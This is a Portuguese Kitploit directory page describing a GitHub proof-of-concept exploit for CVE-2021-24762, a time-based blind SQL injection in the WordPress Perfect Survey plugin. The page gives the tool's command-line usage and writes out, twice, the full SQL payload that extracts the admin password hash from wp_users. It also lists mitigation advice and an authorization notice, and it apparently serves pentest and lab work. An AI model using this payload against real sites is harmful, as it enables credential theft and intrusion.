Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Exploit_CVE-2021-24762 — Este repositório mostra um exploit para CVE-2021-24762. É um exploit de Blind SQLi que, na configuração padrão, extrai a senha do administrador. | Kitploit
Ferramentas/GitHubGitHub/c4cnm/exploit_cve-2021-24762
Quebra de SenhasAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubc4cnm/exploit_cve-2021-24762

Exploit_CVE-2021-24762

Este repositório mostra um exploit para CVE-2021-24762. É um exploit de Blind SQLi que, na configuração padrão, extrai a senha do administrador.

Ver Repositório
1há 10 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

exploit_cve-2021-24762

Este repositório mostra um exploit para CVE-2021-24762. É um exploit de Blind SQLi que, na configuração padrão, obtém a senha do administrador.

Durante um laboratório baseado em Wordpress com o plugin PerfectSurvey, fiquei preso em uma vulnerabilidade SQL. Os únicos PoCs disponíveis que encontrei eram baseados em sqlmap e não estavam funcionando corretamente no laboratório em que estava trabalhando (Havia muitas questões adicionais, por exemplo, a aplicação retornando 404, timeouts variando muito e outros problemas. Então criei isto para explorar o laboratório.

Objetivos

  • Este PoC explora o CVE-2021-24762, que está relacionado ao plugin Perfect Survey do Wordpress. O exploit é baseado em Injeção SQL com SLEEP, e obtém o hash da senha do usuário 'admin'. Este usuário é padrão em ambientes Wordpress.
  • Onde funciona: Plugin Perfect Survey executando versões < 1.5.2.

Impacto e Gravidade

  • CVE-2021-24762: [CVSS 9.8 (Crítica)]
  • Impactos: confidencialidade, integridade, disponibilidade, acesso não autorizado.

Ambiente

  • Requisitos de software: Python3.

Como usar

root@kitploit:~
 ____     _      ___   ____
 / ___|   / \    |_ _| / ___|
| |      / _ \    | |  \___ \
| |___  / ___ \   | |   __ ) |
 \____|/_/   \_\ |___| |____/

   CAIS - Inteligência em Cibersegurança
   Exploit for: CVE-2021-24762

usage: exploit_cve-2021-24762.py [-h] [-u URL] [-p PATH] [-d DELAY] [-t TIMEOUT] [-c CHARSET] [-m MAX_LEN] [-v]

Safe CLI wrapper — receives url/path/delay/timeout/charset and forwards it

options:
  -h, --help            show this help message and exit
  -u, --url URL         Base URL (default: http://192.168.10.10)
  -p, --path PATH       path (default: /wp-admin/admin-ajax.php)
  -d, --delay DELAY     delay in seconds (default: 30)
  -t, --timeout TIMEOUT
                        timeout in seconds (default: delay + 15)
  -c, --charset CHARSET
                        charset to be used (default: alnum + ./$_-@)
  -m, --max-len MAX_LEN
                        maximum length (default: 20)
  -v, --verbose         activates log debugging
  1. O script Python recebe os parâmetros acima. Caso não sejam passados, o script executa com seus valores padrão.

  2. Idealmente, você precisará passar pelo menos a URL. Faça isso com -u ou --url. Outros parâmetros provavelmente funcionarão com os padrões.

  3. Na configuração padrão, ele obterá o hash da senha do usuário admin. Essa configuração é aplicada na variável payload, no valor de user_login: payload = f"1 AND (SELECT COUNT(*) FROM (SELECT 1 WHERE ORD(SUBSTRING((SELECT user_pass FROM wp_users WHERE user_login=0x61646d696e),{position},1))={ascii_code} AND SLEEP({delay})) AS a)"

    Caso precise encontrar o hash para outro usuário, altere "0x61646d696e" (admin) de acordo com suas necessidades.

Riscos e limitações

  • Limitação: Na configuração atual, este PoC só obtém hashes para senhas no Wordpress com as estruturas de banco de dados padrão. Se você encontrar um ambiente modificado, então precisa alterar este payload: payload = f"1 AND (SELECT COUNT(*) FROM (SELECT 1 WHERE ORD(SUBSTRING((SELECT user_pass FROM wp_users WHERE user_login=0x61646d696e),{position},1))={ascii_code} AND SLEEP({delay})) AS a)"

Mitigação e remediação (recomendações)

  • Recomendações de mitigação: Atualize o plugin para a versão 1.5.2 ou superior.
  • Referências:
    • https://nvd.nist.gov/vuln/detail/CVE-2021-24762
    • https://www.getperfectsurvey.com/

Aviso e autorizações

Uso restrito — Este repositório contém conteúdo sensível destinado apenas ao uso ético e responsável. Lembre-se de que você deve ter permissão por escrito do proprietário do sistema que está testando. Qualquer uso fora desse escopo não é permitido e será de sua responsabilidade (Você quer ir para a cadeia?).

Estrutura do repositório

  • exploit_cve-2021-24762 — Exploit.
  • README.ME — Este arquivo.

Changelog

2025-10-10 — c4cnm — Criação e modificações iniciais

Contato

  • Autor: Red Team CAIS:/Matheus Camargo (c4cnm), [email protected].

Licença

GNU General Public License v3 (GPL)

Baixar ferramenta